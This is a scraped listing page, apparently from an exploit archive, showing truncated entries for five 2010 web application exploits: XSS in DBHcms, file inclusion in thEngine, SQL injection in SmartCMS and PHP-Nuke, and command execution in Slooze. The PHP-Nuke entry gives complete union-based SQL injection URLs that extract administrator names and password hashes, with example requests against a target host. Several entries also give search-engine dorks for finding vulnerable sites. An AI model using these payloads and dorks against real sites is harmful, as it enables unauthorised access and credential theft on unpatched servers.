# Title: DBHcms 1.1.4 Stored XSS
# EDB-ID: 12499
# CVE-ID: ()
# OSVDB-ID: ()
# Author: ITSecTeam
# Published: 2010-05-04
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
view source
print?
############################################################################
#Title: DBHcms 1.1.4 Stored XSS #
#Vendor: http://www.drbenhur.com #
#Dork: “powered by DBHcms” #
############################################################################
#AUTHOR: ITSecTeam #
#Email: Bug@ITSecTeam.com #
#Website: http://www.itsecteam.com #
#Forum : http://forum.ITSecTeam.com #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability50.htm
#Thanks: r3dm0v3 [r3dm0v3_at_ymail.com], Pejvak, am!rkh@n #
############################################################################
#DESCRIPTION (by vendor):###################################################
The DBHcms [...]

Continue reading...

# Title: thEngine v0.1 LFI Vulnerability
# EDB-ID: 12504
# CVE-ID: ()
# OSVDB-ID: ()
# Author: team_elite
# Published: 2010-05-04
# Verified: no
# Download Exploit Code
# Download Vulnerable app
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~ Greetz and Thanks to: All member manadocoding.net ~~~~
~~~~ [...]

Continue reading...

# Title: SmartCMS v.2 SQL Injection Vulnerability
# EDB-ID: 12507
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Ariko-Security
# Published: 2010-05-04
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
============ { Ariko-Security - Advisory #1/5/2010 } =============
SQL injection vulnerability in SmartCMS v.2
Vendor’s Description of Software:
# http://www.smartwebsites.com.cy/index.php?pageid=13〈=en
Dork:
# n/a
Application Info:
# Name: SmartCMS
# Versions: V.2
Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: medium
Fix:
# N/A
Time [...]

Continue reading...

# Title: PHP-NUKE v5.0 viewslink Remote SQL Injection
# EDB-ID: 12514
# CVE-ID: ()
# OSVDB-ID: ()
# Author: CMD
# Published: 2010-05-05
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
# Author: CMD
# Contact: cemede@ilkposta.com
# Dork: [allinurl: op=viewslink&sid=]
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Code :
[
Exploit 1:
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
Exploit 2:
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/authors/**/where/**/radminsuper=1/*
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*
]
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Example :
[
Example 1 :
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
Example 2 :
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/authors/**/where/**/radminsuper=1/*
]
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
#Thanx : AmeN & MUS4LLAT & Snaritx & JacKal & Metrp0l
& Ve sayamadıklarım
#Says [...]

Continue reading...

# Title: Slooze PHP Web Photo Album v0.2.7 Command Execution Vulnerability
# EDB-ID: 12515
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Sn!pEr.S!Te hacker
# Published: 2010-05-05
# Verified: no
# Download Exploit Code
# Download Vulnerable app
(slooze.php) Command Execution Vulnerability
#[+] Author : Sn!pEr.S!Te hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker #
#[+] Site [...]

Continue reading...